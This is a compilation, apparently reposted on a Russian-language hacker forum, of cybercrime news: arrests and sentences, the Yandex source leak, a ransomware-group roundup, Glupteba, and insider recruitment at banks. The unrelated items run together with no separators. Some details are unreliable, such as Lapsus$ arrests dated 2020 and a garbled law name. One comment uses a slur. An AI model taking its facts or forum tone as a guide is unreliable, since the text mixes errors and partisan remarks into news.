Также установлено, что один из фигурантов разыскивался правоохранительными органами других государств. Так правонарушитель с помощью «вируса» получал данные банковских карт клиентов британских банков. За счет потерпевших злоумышленник покупал разные товары в интернет-магазинах и впоследствии перепродавал их.
Сотрудники полиции совместно с правоохранителями Великобритании и Соединенных
Штатов Америки провели 9 обысков в домах фигурантов и в их автомобилях. Изъята
компьютерная техника, мобильные телефоны, банковские карты, флеш-накопители и
три автомобиля.
К проведению обысков также были привлечены работники подразделения ТОР
Департамента патрульной полиции.
Открыто уголовное производство по ч. 2 ст. 361 (Несанкционированное
вмешательство в работу компьютеров, автоматизированных систем, компьютерных
сетей или сетей электросвязи), ч. 2 ст. 361-1 (создание с целью использования,
распространения или сбыта вредоносных программных или технических средств, а
также их распространение или сбыт), ст. 209 (Легализация (отмывание)
имущества, полученного преступным путем) Уголовного кодекса Украины.
Следственные действия продолжаются.
[источник](https://cyberpolice-gov-ua.translate.goog/news/kiberpolicziya-
vykryla-xakerske-ugrupovannya-na-atakax-inozemnyx-kompanij-virusom-
shyfruvalnykom-4133/?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=wapp)
25 января 2023 в сети появились исходные коды и сопутствующие им данные
множества сервисов и программ компании Яндекс. Раздача содержит отдельные
архивы (.tar.bz2), по названиям которых можно идентифицировать соответствующие
сервисы Яндекса.
Общий объём архивов (в сжатом виде) составляет более 44.7 ГБ.
26 января 2023 «Яндекс» подтвердил Хабру публикацию исходных кодов части проектов из внутреннего репозитория.
Ранее, в 2022 году, в свободном доступе были выложены архивы сервиса «Яндекс.Еда» с данными заказов клиентов.
Название архива| Размер
---|---
frontend| 18.26 ГБ
classfields| 4.67 ГБ
market| 4.00 ГБ
taxi| 3.30 ГБ
portal| 2.35 ГБ
Огласите весь список!
Сначала был ТОП-5 забавных названий папок и модулей. По мере изучения
исходников, возник уже ТОП-10, потом ТОП-20 и ТОП-30, но… в какой-то момент
остроумие авторов несколько утомило и я перестал фиксировать названия, которые
уже не казались такими забавными.
Общее количество папок: 83
Полный список папок
Даты файлов
Версии Python
Source: habr.com/ru/news/t/712888
1,5 года за счет своей популярности нигериец воровал по-чёрному.
Международный кибермошенник и звезда соцсетей, который планировал отмыть более
$300 млн., на этой неделе был признан виновным в мошенничестве , и должен
вернуть своим жертвам более $1,7 млн. долларов.
40-летний уроженец Нигерии Рамон Олорунва Аббас, также известный как Рэй Хушпуппи, признал себя виновным в заговоре и проведет 11 лет и 3 месяца в тюрьме США за участие в многочисленных схемах онлайн-мошенничества. Аббас был арестован в своем доме в Дубае в июне 2020 года и экстрадирован в США, где он будет отбывать наказание.
Аббас и его сообщники использовали компрометацию деловой электронной почты (BEC-атака) для кражи денег у нескольких компаний по всему миру, а также у частных лиц и даже у неназванного футбольного клуба английской премьер-лиги.
Аббас был активным пользователем соцсетей с 2,3 млн. подписчиков. Он регулярно
публиковал фотографии своего роскошного образа жизни – полеты на частном
самолете, дорогие автомобили, толстые пачки денег и т.д.


Аббас проводил многочисленные киберпреступные кампании. Так, в ходе нескольких
кампаний в 2019 году он вместе с напарником отмыл примерно $14,7 млн.,
украденных из банка на Мальте. Также они провели аферу против команды
английской Премьер-лиги и одной британской компании.
Аббас также причастен к краже более $990 тыс. у нью-йоркской юридической фирмы
в 2019 году, а также признал свою вину в сговоре с целью обмана гражданина
Катара, который искал ссуду в размере $15 млн. для строительства школы.
Аббас был арестован федеральными властями за сговор с целью отмывания более
$300 млн. По словам прокуратуры, процесс отмывания был тщательно спланирован,
что показывает «серьезность его преступной деятельности».
Аббас признал себя виновным по единственному обвинению в сговоре с целью
отмывания денег в апреле 2021 года. Также он обязан вернуть деньги, украденные
у нью-йоркской юридической фирмы, а также около $810 тыс. лицу из Катара.
По словам прокуратуры, Аббас, возможно, оказывал свои услуги по отмыванию
денег правительству Северной Кореи, которое обвиняется США за взлом банка на
Мальте в 2019 году . Сумма, украденная северокорейскими хакерами , совпадает с
той суммой, которая фигурирует в деле Аббаса.
The government of Belarus has passed a law that permits the use of media and intellectual property, such as computer software, in the country without the consent of copyright holders from “unfriendly” foreign nations.
It specifies that the use of intellectual property such as film, music, software, and television programs is allowed without the consent of the copyrights holders, if those entities are from countries that commit “unfriendly actions” against Belarus.
It also states that people must pay a remuneration fee to bank accounts operated by the state-owned National Patent Authority. Any money sent to the patent authority will be held for three years, allowing any international rights holders to make a claim. If no claims are made, the Belarus government will keep the fee.
Will the USA-tards start rolling trojans directed to the people of Belarus
when they download stuff?
Be careful out there.
Source: (i don't like giving views to these kind of sites, so here's a web
archive of the article)
[https://web.archive.org/web/2023011...lizes-pirating-media-from-unfriendly-
nations9](https://web.archive.org/web/20230112171729/https://www.vice.com/en/article/n7zpww/russia-
ally-belarus-legalizes-pirating-media-from-unfriendly-nations9)
По словам исследователей Fortinet, шифровальщик становится вайпером не по
замыслу разработчика, а из-за ошибки в коде.
Исследователи Fortinet обнаружили в дикой природе новое вымогательское ПО с
открытым кодом под названием Cryptonite, которое бесплатно распространялось на
Github. Как выяснили специалисты, из-за ошибки в коде вредонос не шифрует, а
просто уничтожает данные жертвы.
В отличие от других программ-вымогателей, Cryptonite бесплатно предлагался
всем желающим: его опубликовал на своем GitHub пользователь под ником
CYBERDEVILZ. Однако сейчас исходный код вредоноса и все его форки удалены с
площадки.
По словам исследователей Fortinet, Cryptonite написан на Python и работает
крайне просто – для шифрования файлов используется модуль Fernet, а их
расширения меняются на .cryptn8. Однако последняя версия вредоноса оказалась с
подвохом: специалисты обнаружили, что Cryptonite блокирует файлы без
возможности расшифровки, по сути становясь вайпером.
Эксперты считают, что такое поведение шифровальщика не является частью замысла
разработчика, а скорее связано с его низкой квалификацией, так как ошибки в
коде приводят к сбою программы при попытке отобразить записку о выкупе после
завершения процесса шифрования.
"Проблема заключается в том, что из-за простоты конструкции шифровальщика нет
возможности восстановить зашифрованные файлы в случае сбоя или закрытия
программы”, – сказал исследователь Fortinet Гергели Ревай.
Кроме того, ошибка, возникающая во время работы шифровальщика, приводит к
тому, что ключ, используемый для шифрования файлов, не передается операторам,
тем самым полностью блокируя доступ к данным жертвы.
Финансовое мошенничество нанесло ущерб компаниям в размере $9,2 млн.
9 декабря в США были арестованы четверо мужчин, обвиняемых в причастности к
мошенничеству с кредитными картами и компрометации деловой электронной почты
(Компрометация деловой электронной почты (BEC) - это один из видов атак
социальной инженерии, осуществляемых через электронную почту. В ходе такой
атаки злоумышленник подделывает сообщение электронной почты, чтобы обманом
заставить жертву выполнить какое-либо действие - чаще всего перевод денег на
счет злоумышленника.
BEC-атака. Арестованные обвиняются в том, что в течение 3 месяцев в 2021 году
они украли у предприятий, частных лиц и банков более $9,2 млн.
Согласно обвинительному заключению, преступники использовали мошенничество с электронной почтой, нацеленное на конкретные предприятия, для инициирования поддельных банковских переводов.
В одном случае они получили доступ к адресу электронной почты финансового директора общественной организации по развитию, который они использовали для запроса денежных переводов с банковского счета организации. В конечном итоге было переведено почти $3,5 млн., из которых $1,57 млн. поступили на счет мошенников. Средства были переведены на другие счета и конвертированы в биткойны.
В другом случае они скомпрометировали учетную запись электронной почты сотрудника компании, принадлежащей фонду прямых инвестиций. Затем они инициировали выплату этому сотруднику около $2 млн.
Мужчины также занимались мошенничеством с кредитными картами, выпущенными на имя третьих лиц без их согласия. Общий ущерб составил почти $4 млн., при этом ответчики написали по электронной почте обоснования обвинений после того, как некоторые из них были оспорены.
Обвинения, которые касаются мошенничества с использованием электронных средств, банковского мошенничества, отмывания денег и кражи личных данных, будут предъявлены в Южном округе Нью-Йорка. В расследовании участвовали Секретная служба США и ФБР. В случае признания вины, каждое из обвинений влечет за собой максимальное наказание от 20 до 30 лет лишения свободы.
В Австралии вынесен приговор в отношении 24-летней женщины, которая активно занималась кражей и скупкой персональных данных для последующего обворовывания пострадавших. Осужденная получила довольно длительный срок.
66 месяцев за $3,3 млн
На днях 24-летнюю жительницу Австралии приговорили к 66 месяцам тюремного заключения за участие в масштабной криминальной операции, связанной с хищением идентификационных данных и кражей финансовых средств. Злоумышленники, среди которых была осужденная, похитили как минимум $3,3 млн, отмыли $2,5 млн и сверх этого пытались украсть еще около $7,5 млн.
Федеральная полиция Австралии арестовала осужденную в 2019 г. в рамках операции «Розги» (OperationBirks; слово birks также может переводиться как «открывающие кавычки» или сленговое «тугодумы»). На момент ареста ей был всего 21 год. В ее доме прошли обыски. На конфискованных устройствах обнаружились многочисленные доказательства того, что подсудимая занималась скупкой персональных данных в даркнете, использовала нелегальные SIM-карты и подменяла почтовые адреса для «перехвата личности» жертв.
Эти персональные данные затем использовались для того, чтобы открыть более 60 банковских счетов во множестве австралийских банков, на которые выводили средства пенсионных взносов и с биржевых аккаунтов.
Злоумышленники широко использовали фишинговые сайты, размещенные в доменах, специально напоминающих легитимные бренды; их продвигали с помощью мошеннической рекламы в результатах поиска Google.
Эти фишинговые сайты также использовались для сбора персональных данных, которые затем использовались для получения доступа к банковским счетам.
Схема: сложная, но не новая
После перевода денег на поддельные счета осужденная переводила их своему партнеру в Гонконг, который, в свою очередь, обналичивал их, закупал и перепродавал дорогостоящие товары (в частности, ювелирные изделия). Отмытые таким образом средства по частям переводились обратно в Австралию в виде криптовалют, чтобы сложнее было отследить украденное.
Осужденная, как сообщается, полностью признала вину.
В сообщении Федеральной полиции Австралии отмечается, что большинство жертв были не в курсе, что их персональные данные были украдены и продавались на черном рынке, а потому не имели возможности защититься от мошеннических атак.
«Ничего радикально нового в этой схеме нет, и, скорее всего, осужденная и ее подельники ничего особенно сами не выдумывали, а просто воспроизводили модель кого-то чуть более успешного, — предполагает Анастасия Мельникова, директор по информационной безопасности компании SEQ. — В пресс-релизе австралийских правоохранителей ничего не говорится, правда, каким образом осужденная вообще попала в их поле зрения. В мире киберкриминала зачастую все средства хороши, так что на нее вполне мог донести кто-то из менее успешных конкурентов».
Вместе с 2022 годом завершилась и карьера самых опасных киберпреступников.
В течение всего 2022 года правоохранительные органы по всему миру пресекали крупнейшие киберпреступления, иногда прибегая к новым и нетрадиционным методам. От украденных миллиардов долларов до хакеров-подростков, взломавших сети Fortune 500, в этом году произошли одни из самых громких взломов.
Криптовалютный мир подвергся блокировкам и взломам
В начале 2022 года Министерство юстиции США конфисковало биткойны на сумму более $3,6 млрд., предположительно украденные в результате взлома криптовалютной биржи Bitfinex в 2016 году. По подозрению в отмывании украденных денег была арестована супружеская пара – 34-летний Илья Лихтенштейн и 31-летняя Хизер Морган, - которым грозит до 25 лет тюрьмы, если они будут признаны виновными в сговоре с целью отмывания денег и обмане правительства США.
Также в 2022 году Минфин США наложил санкции и заблокировал децентрализованный криптовалютный миксер Tornado Cash за его роль в обеспечении возможности отмывания украденной криптовалюты на миллиарды долларов. Миксер Tornado Cash смешивает потенциально идентифицируемые криптовалютные средства с другими, чтобы скрыть источник и назначение криптоактивов. По оценкам экспертов, на сегодняшний день через Tornado Cash было отмыто более $7 млрд. доходов от киберпреступлений – атак программ-вымогателей и мошенничества.
Награда за поимку хакеров и крупные выкупы киберпреступникам
В августе правительство США опубликовало фото подозреваемого оператора программ-вымогателей Conti, известного как «Target». Также была объявлена награда в размере до $15 млн. за информацию , позволяющую установить личность и местонахождение «Target», а также четырех других предполагаемых членов Conti.

По словам Госдепа США, Conti провела более 1000 вымогательских кампаний против критической инфраструктуры США и других стран. В 2022 году атаки Conti на госучреждения Коста-Рики даже привели к чрезвычайному положению в стране .
Также в 2022 году группировка кибервымогателей NetWalker провела атаку на Калифорнийский университет в Сан-Франциско, который заплатил выкуп хакерам в размере более $1 млн . По данным ФБР , группа Netwalker заработала почти $60 млн. Самый крупный требуемый выкуп составлял $14 млн., а самая высокая фактическая выплата составляла $3 млн.
В октябре 34-летний IT-консультант Себастьен Вашон-Дежарден из Квебека признал свою вину по обвинениям, связанным с его причастностью к NetWalker, и был приговорен к 7 годам тюремного заключения. Во время обыска в его доме сотрудники правоохранительных органов обнаружили и изъяли 719 биткойнов и 790 000 канадских долларов.
Украденные миллиарды долларов маркетплейса Silk Road
В ноябре ФБР изъяло биткойны на сумму $3,36 млрд ., $600 000 наличными и большое количество драгоценных металлов у хакера по имени Джеймс Чжун. Правоохранителям удалось выяснить, что Джеймс Чжун был одним из членов даркнет-маркетплейса Silk Road, который работал с 2011 по 2013 год. Как рассказал сам хакер, в сентябре 2012 года он украл 50 000 биткоинов с платформы Silk Road, воспользовавшись багом в системе вывода средств.

Оператор трояна Raccoon Stealer украл учетные данные более 50 млн. пользователей
Официальные лица США в октябре обвинили гражданина Украины в его причастности к операции Raccoon Infostealer , которая заразила миллионы компьютеров по всему миру. Марк Соколовский обвиняется в том, что он являлся ключевым оператором вредоносного ПО, которое, по словам прокуратуры, использовалось для кражи более 50 млн. уникальных учетных данных и форм идентификации у жертв по всему миру с февраля 2019 года. Соколовскому грозит до 20 лет лишения свободы.
Raccoon Stealer — это троян для кражи информации, распространяемый по MaaS- модели (Malware-as-a-Service, вредоносное ПО как услуга), который злоумышленники могут арендовать за $75 в неделю или $200 в месяц.
Аресты участников группировки Lapsus$
В марте 2020 года были арестованы 7 человек в возрасте от 16 до 21 года по подозрению в связи с группировкой Lapsus$ . Например, 16-летний подросток под псевдонимами «White» и «Breachbase», был ключевой фигурой в Lapsus$. Его арестовали после того, как конкурирующие хакеры опубликовали в сети его личную информацию .
Бывший инженерAmazon украла личные данные 100 млн. клиентов Capital One
Бывший инженер Amazon Пейдж Томпсон была признана в компрометации личной и финансовой информации 100 млн. клиентов американской банковской компании Capital One в 2019 году. Этот взлом стал одним из крупнейших ограблений банков в истории США.
Томпсон обвинили в том, что она использовала свои знания инженера-программиста Amazon для взлома облачного онлайн-хранилища CapitalOne, размещенного на серверах Amazon, и компрометации облачных хранилищ компаний Vodafone, Ford и других. Она осуждена за 7 федеральных преступлений: за одно только электронное мошенничество ей грозит до 20 лет, а по каждому из других обвинений – до 5 лет.
Крупного оператора REvil экстрадировали в США
22-летний Ярослав Васинский был арестован в Польше в октябре и экстрадирован в США по обвинению во взломе компьютеров и мошенничестве в связи с его предполагаемой причастностью к REvil. Васинский ответственен за вымогательскую атаку на поставщика ПО Kaseya в июне 2021 года , которая в конечном итоге затронула сотни клиентов.
Ему грозит в общей сложности 115 лет лишения свободы, если его признают виновным по всем пунктам обвинения.
17-подросток взломал Uber и Rockstar Games
17-летний подросток, подозреваемый в причастности к громким кибератакам на Uber и Rockstar Games, был арестован по нескольким пунктам обвинения в неправомерном использовании компьютера и нарушении залога. Эти взломы стали одними из самых громких в 2022 году.
Uber была вынуждена отключить некоторые из своих внутренних инструментов . А в случае с Rockstar Games – злоумышленник получил доступ к внутренним сообщениям компании в Slack и коду для неизданной GTA 6, скомпрометировав учетную запись сотрудника.
Им уже предъявлены обвинения, максимальное наказание по которым предусматривает до 25 лет лишения свободы.
Федеральное большое жюри и Комиссия по ценным бумагам и биржам США предъявили обвинения восьми мужчинам в том, что в период с января 2020 года по апрель 2022 года они якобы использовали схему pump-and-dump ("накачка и сброс"), искусственно завышая стоимость акций, призывая 1,5 миллиона подписчиков в Twitter и пользователей Discord покупать их. Как только жертвы покупали акции, подозреваемые продавали их, обрушивая цену. По данным Министерства юстиции, на этой схеме они заработали $114 миллионов.
Помимо твитов, группа предположительно использовала Discord-сервер (Atlas Trading) для распространения фальшивой информации об акциях. Стоит отметить, что одним из участников схемы был подкастер Дэниел Найт, который приглашал на свои подкасты подельников и выдавал их за экспертов в области инвестиций.
Всем восьмерым предъявлено как минимум одно обвинение в сговоре с целью совершения мошенничества с ценными бумагами. Эдвард Константинеску (он же Константин), Перри "Пи Джей" Мэтлок, Джон Рыбарчик, Гэри Дил, Стефан Хрватин, Том Куперман и Митчелл Хеннесси предъявлены дополнительные обвинения, связанные с мошенничеством с ценными бумагами и (в случае Константинеску) незаконными денежными операциями. SEC также обвинила Найта в пособничестве подозреваемым.
Обвинения в сговоре и мошенничестве предусматривают максимальное наказание в виде 25 лет лишения свободы по каждому пункт. Кроме того, на обвиняемых могут быть наложены дополнительные санкции, включая возвращение всего незаконно заработанного.
Для этого он создал множество копий даркнет-маркетплейсов и брал по $100 за регистрацию на них.
Команда исследователей из Sophos обнаружила “Хайзенберга” после того, как наткнулась на созданный им сайт Genesis Market, расположенный в клирнете. Genesis Market – это даркнет-маркетплейс, предлагающий хакерам купить учетные данные, cookie-файлы и эксплойты уязвимостей различных веб-платформ для проведения кибератак.
Как сообщают специалисты, фейковый сайт требует от пользователей внести $100 для создания аккаунта, в то время как настоящий сайт работает только по приглашениям. Собрав крохи информации, оставленные злоумышленником, эксперты вышли на другие поддельные сайты, работающие по той же схеме. С августа 2021 по июнь 2022 года им удалось обнаружить около 20 подобных сайтов.
Судя по всему, эта афера оказалась довольно успешной – на криптокошельках владельца сайтов оказалось более $132 000, большую часть из которых злоумышленник уже вывел.
Исследователи считают, что им удалось найти ответственного за это человека – пользователя даркнет-маркетплейса Dread под ником waltcranston. Этот никнейм объединяет в себе имена главного героя сериала “Во все тяжкие” Уолтера Уайта и актера, который его играет – Брайана Крэнстона.
Однако, все может быть не так просто, ведь команде исследователей не удалось найти стопроцентных доказательств того, что за всеми поддельными сайтам стоит именно waltcranston.
source: sophos.com/en-us/press-office/press-releases/2022/12/sophos- unravels-20-fake-criminal-marketplaces-designed-to-scam-scammers
Подводим итоги и выясняем кто себя плохо вёл в этом году.
За последний год группировки то распадались, то вновь образовывались, но одно можно сказать наверняка — они продолжают существовать.
Несмотря на все усилия, проблема программ-вымогателей продолжает расти: в недавнем отчете ИБ-компании Zscaler зафиксирован рост числа атак программ- вымогателей на 80% по сравнению с прошлым годом. Основные тенденции включали двойное вымогательство, атаки на цепочку поставок, вымогательство как услугу (Ransomware-as-a-Service, RaaS), ребрендинг групп и геополитически мотивированные атаки.
Например, в этом году известная группа вымогателей Conti распалась , но ее участники только продвинулись вперед, формируя новые банды.
Каких групп следует остерегаться в 2023 году? Мы рассмотрим некоторых из наиболее значимых игроков.
LockBit
LockBit существует с 2019 года и работает по RaaS-модели. По данным GuidePoint Security, самая многочисленная группа, на которую приходится более 4 из 10 жертв программ-вымогателей. Считается, что хакеры LockBit связаны с Россией .
Версия вымогательского ПО LockBit 3.0 была выпущена в июне и уже распространилась на 41 страну, согласно Intel 471. Основные цели - профессиональные услуги, консалтинг и производство , потребительские и промышленные товары , а также недвижимость.
Кроме того, LockBit запустила свою собственную программу Bug Bounty , предлагая до $1 млн. за обнаружение уязвимостей в своих вредоносных программах, сайтах утечки, Tor-сети или службе обмена сообщениями.
Black Basta
Группировка Black Basta впервые появилась весной этого года и за первые 2 недели атаковала не менее 20 компаний. Предполагается, что группа состоит из бывших участников Conti и REvil .
В настоящее время Black Basta проводит кампанию с использованием вредоносного ПО QakBot , банковского трояна, используемого для кражи финансовых данных жертв, включая информацию о браузере, нажатия клавиш и учетные данные.
Считается, что Black Basta за последний квартал поразила около 50 организаций в США, в том числе Американскую Ассоциацию Стоматологов (ADA) и канадскую компанию по розничной торговле продуктами питания Sobeys. Более половины целей группы были из США.
Hive
Hive, третья по активности группа вымогателей в этом году, фокусируется на промышленном секторе, а также на организациях здравоохранения, энергетики и сельского хозяйства. По данным ФБР, хакеры атаковали 1300 компаний по всему миру, особенно в секторе здравоохранения, и получили около $100 млн. в виде выкупа.
В последние недели группа взяла на себя ответственность за атаку на индийскую энергетическую компанию Tata Power , выложив данные фирмы в сеть, а также нескольких колледжей в США.
Hive, как полагают эксперты, сотрудничает с другими группами вымогателей и имеет собственную службу поддержки клиентов и отделы продаж. Группировка также занимается тройным вымогательством.
ALPHV/BlackCat
ALPHV/BlackCat – одно из самых сложных и гибких семейств программ-вымогателей, основанное на языке программирования Rust, которое существует уже около года. Считается, что группа состоит из бывших членов банды REvil и связана с BlackMatter (DarkSide).
Группа также работает по RaaS-модели, эксплуатируя известные уязвимости или незащищенные учетные данные, а затем проводя DDoS-атаки, чтобы заставить жертву заплатить выкуп. Хакеры BlackCat раскрывают украденные данные через собственную поисковую систему.
Целями группы являются организации критической инфраструктуры, в том числе аэропорты, операторы топливных трубопроводов и нефтеперерабатывающие заводы, а также Министерство обороны США.
Требования выкупа исчисляются миллионами, и даже когда жертва платит, группа не всегда предоставляет обещанные инструменты дешифрования .
BianLian
Относительно новый игрок, который нацелен на организации в Австралии, Северной Америке и Великобритании. Группа быстро запускает в сеть новые серверы управления и контроля (C&C), что указывает на то, что хакеры планируют значительно увеличить активность.
Как и многие другие программы-вымогатели, BianLian основан на языке Go, что обеспечивает ему высокую гибкость и кроссплатформенность . Согласно изданию Redacted, группа состоит из относительно неопытных киберпреступников, поскольку они плохо знакомы с практическими бизнес-аспектами программ- вымогателей и связанной с ними логистикой. Широкий круг жертв группы указывает на то, что она мотивирована деньгами, а не какими-либо политическими идеями.
Другие новые группы
Мир программ-вымогателей постоянно меняется, и несколько групп переименовались: DarkSide теперь называется BlackMatter, DoppelPaymer стал Grief, а Rook переименовался в Pandora. Кроме того, за последний год появились новые группы – Mindware, Cheers, RansomHouse и DarkAngels. О них мы, вероятно, услышим в следующем году.
source: zscaler.com/blogs/security-research/2022-encrypted-attacks-report
Анализ системы вывода денежных средств, похищенных у граждан РФ. Проблемы и
меры.
О дропах,дроповодах,теневых площадках,(на примере DarkMoney) и методах борьбы
Сбера.
https://drive.google.com/file/d/1sA6-zEBZe0qjBDqHmjP18FuIE9gQwvPy
Google, принадлежащая Alphabet, подает в суд на двух граждан России, которые, как утверждается, являются частью преступной организации, которая незаметно проникла в более чем миллион компьютеров и устройств по всему миру, создав «современное технологическое воплощение организованной преступности без границ».
В иске, обнародованном во вторник в Окружном суде США Южного округа Нью-Йорка, Google называет двух обвиняемых, Дмитрия Старовикова и Александра Филиппова , а также 15 неустановленных лиц. Google утверждает, что ответчики создали «ботнет», известный как Glupteba, для использования в незаконных целях, включая кражу и несанкционированное использование логина и информации учетной записи пользователей Google.
Ботнет Glupteba отличается от других своей «технической сложностью», в которой для защиты от сбоев используется технология блокчейн, говорится в жалобе Google. По словам Google, в любой момент мощность ботнета Glupteba может быть использована для атаки с использованием программ-вымогателей или распределенной атаки типа «отказ в обслуживании».
Компания Chainalysis, занимающаяся криминалистическим анализом цепочек блоков, заявила, что ее продукты и услуги использовались для расследования ботнета.
Каждый раз, когда один из командно-управляющих серверов Glupteba, который хакеры используют для управления скомпрометированными сетями, выключается, он может сканировать блокчейн, чтобы найти новый адрес домена командного сервера, согласно заявлению Chainalysis.
«Эта тактика делает чрезвычайно трудным нарушение работы ботнета Glupteba с помощью традиционных методов кибербезопасности», которые, по словам Chainalysis, сосредоточены на отключении доменов командных серверов ботнета. «Это первый известный случай ботнета, использующего такой подход».
Это также первый случай, когда Google преследует ботнет, сообщил представитель калифорнийской компании в Маунтин-Вью. «Мы предпринимаем это действие, чтобы еще больше защитить пользователей Интернета и сообщить киберпреступникам, что мы не потерпим такого рода деятельности».
По словам представителя компании, расследование проводилось совместно с Министерством юстиции США. В Министерстве юстиции от комментариев отказались. Найти Старовикова и Филиппова для получения комментариев не удалось.
По словам пресс-секретаря, технологический гигант подал иск в суд, чтобы «привлечь киберпреступников к юридической ответственности». Чтобы «раскрыть их личности и инфраструктуру, которую они используют».
Google сообщил, что Старовиков и Филиппов были подключены к Glupteba через серверы, которые использовались для настройки их адресов Gmail.
«Glupteba печально известна тем, что крадет учетные данные и данные пользователей, добывает криптовалюту на зараженных хостах и настраивает прокси для перенаправления интернет-трафика других людей через зараженные машины и маршрутизаторы», - написали генеральный советник Google Халима ДеЛейн Прадо и вице-президент Google по инженерным вопросам Роял Хансен. в сообщении в блоге.
В июне 2020 года охранная фирма Sophos опубликовала отчет о вредоносной программе Glupteba, отметив, что она «способна постоянно препятствовать попыткам ее удаления с зараженной машины», - писал тогда исследователь Лука Надь. «Glupteba также использует различные подходы, чтобы оставаться на дне и не быть замеченным».
Google заявила, что подает иск в соответствии с Законом об организациях, оказывающих влияние на сеть, и коррумпированными организациями, известным как RICO, а также Законом о компьютерном мошенничестве и злоупотреблениях, Законом о конфиденциальности электронных коммуникаций и другими, чтобы нарушить работу ботнета, предотвратить его дальнейшее распространение и взыскать убытки.
Стоит отметить, что некоторые из самых известных киберпреступных группировок связаны с Россией, которую обвиняют в предоставлении им убежища. Кремль неоднократно отрицал ответственность за любые хакерские атаки.
• Source: <https://storage.googleapis.com/gweb-uniblog-publish- prod/documents/1_Complaint.pdf>
• Source: <https://blog.google/technology/safety-security/new-action-combat- cyber-crime/>
• Source: [https://www.bloomberg.com/news/arti...o-russians-for-alleged- organized-crime- scheme](https://www.bloomberg.com/news/articles/2021-12-07/google-sues-two- russians-for-alleged-organized-crime-scheme)
За слив баз данных работникам российских банков стали предлагать переезд за границу.
Сотрудников российских банков стали под новым предлогом вербовать в даркнете и Telegram-каналах — им обещают релокацию в западные страны. Об этом сообщают «Известия» со ссылкой на источники в финансовой сфере.
Один из источников в крупном банке также подтвердил, что в даркнете встречаются подобные предложения, предупредив, что сотрудники этих организаций могут согласиться и в обмен на релокацию предоставить доступ к данным организации.
Помимо помощи с переездом в хакерских телеграм-каналах за сливы предлагают и оформление паспортов других государств, рассказал изданию эксперт из компании "РТК-Солар".
Однако ряд экспертов считает, что предложения такого рода обманчивы, потому что расходы на организацию переезда за границу зачастую выше коммерческой стоимости, полученной от сотрудника банка базы данных.
Инсайдеров всегда "покупали", но предложение релокации — это новшество, отметил один из собеседников издания.
В ЦБ подчеркнули, что кредитные организации обязаны ограничивать перечень сотрудников, имеющих доступ к чувствительной информации. Инсайдеры могут достать необходимые для телефонных мошенничеств данные россиян, а также предоставить доступ к системам организации для проведения хакерской атаки.
С такой идеей выступил депутат от «Справедливой России» Дмитрий Гусев.
«Наши программисты лучшие в мире и все это знают. К сожалению, они сейчас уезжают за рубеж, думая, что могут попасть в армию и пойти служить с оружием в руках. Но их оружие – компьютер», - заявил он.
Ранее русские хакеры из команды XakNet заявили, что взломали Минфин Украины и получили доступ к документам. По словам депутата, за такое нужно давать воинские звания и госнаграды. Также Гусев подчеркнул, что неважно, где находится хакер.
Вскоре после публикации новости про обвинительный приговор в Томске, вынесенный за использование защищённого мессенджера VIPole, стало известно об ещё одном «свежем» деле с обвинением по ч.2 ст. 273 УК РФ. Житель Ахтубинска Сосин П.В. был [осуждён](https://epp.genproc.gov.ru/web/proc_30/mass- media/news?item=77314451) за производство и распространение некой вредоносной программы WASP 1.0. Информационная служба Хабра нашла родственников осуждённого, которые согласились предоставить все документы и подробности по этому делу. Как выяснилось, программа состоит из трёх опенсорсных элементов: SQLmap, Apache HTTP-сервер и сканер Arachni. Как рассказали родственники, Сосина приговорили к штрафу и реальному заключению именно за использование SQLmap, поскольку утилита считается вредоносной на территории РФ, что в суде подтвердили представители ФСБ России.
Дальше хохмы:
Даже эксперт ФСБ в суде заявил, что sqlmap определяется Dr.Web как вредонос sqlmap»
Click to expand...
После проверки работоспособности программу выставили на продажу на сайте cracked[.]to по цене $300. (прим. того кто постил - че не на лолзе то? XD)
Click to expand...
Хабр обратился к специалисту сервиса разведки утечек данных и мониторинга даркнета DLBI Ашоту Оганесяну с просьбой прокомментировать ситуацию.
Click to expand...
Приветствую, дорогие дамагеры. Вчера вечером на сайте fragment.com произошло
то, чего, наверное, не только я ждал очень давно. Стала доступна продажа ваших
Юзернеймов телеграмм. Система там достаточно проста. Чтобы выставить свой
юзернейм на аукцион - вы должны сделать первую ставку, от которой уже будут
идти следующие, от заинтересовавшихся вашим юзернеймом пользователями. На
данный момент в моей коллекции находится былее 50-ти различных юзернеймов,
интересных и не очень и уже 5 штук я смог выставить на аукцион. Немного
расскажу поподробнее об этом.
После выставления юзернейма на аукцион - у вас появится специальное окно над
чужими юзернеймами. В этом окне будет ваш юзернейм и его статус. Пример на
фото - . Что мы можем
увидеть? Около четырёх моих юзернеймов написан текст - Highest Bid - это
значит, что ставка другими пользователями ещё не сделана. Около юзернейма
@street_beat - написано Outbid. Если немного подумать - можно догадаться, что
это юзернейм, за который уже ведётся борьба. Из интересного отмечу вам, что
после того, как другой человек делает ставку - ваша ставка возвращается к вам
на кошелёк TON. Так же заметил, что юзернеймы, которые вы заняли в течение
недели не получается выставить на биржу, тоесть после занятия юзернейма вам
нужно будет прождать 7 дней, после чего у вас получится выставить его на
аукцион. Люди, у которых имеется куча юзернеймов - можете попробовать сделать
неплохие деньги, и как я понял - вы абсолютно ничего терять не будете, ведь по
истечении 7 дней, если никто не сделал ставку - вы получаете свои средства
обратно. А так же - предложение для кодеров с опытом.
You must have at least 10 reaction(s) to view the content.
Апелляционный суд США по девятому округу оставил в силе приговор Роману Селезневу, сыну депутата Госдумы РФ Валерия Селезнева, осужденному на 27 лет заключения по обвинению в кибермошенничестве: краже данных кредитных карт и организации онлайн-махинаций.
«Длительный тюремный срок Селезнева не является по существу необоснованным, учитывая ущерб, который он, несомненно, нанес многим коммерческим структурам, большие суммы денег, полученные Селезневым в результате махинаций, общее отсутствие у него чувства вины, необходимость сдерживать других правонарушителей, которые могут просчитывать подобного рода махинации, а также приговоры, вынесенные подсудимым при схожих условиях», — говорится в постановлении суда.
Апелляционная инстанция также признала закономерным отказ окружного суда отклонить обвинительное заключение, учитывая обстоятельства задержания россиянина, которое он сам наряду с МИДом РФ расценивает как похищение.
«В целом, то, как обеспечивается явка обвиняемого в суд, не влияет на способность властей привлекать его к ответственности», — говорится в постановлении.
В общей сложности апелляция была заявлена по семи пунктам, и по каждому из них суд отказал.
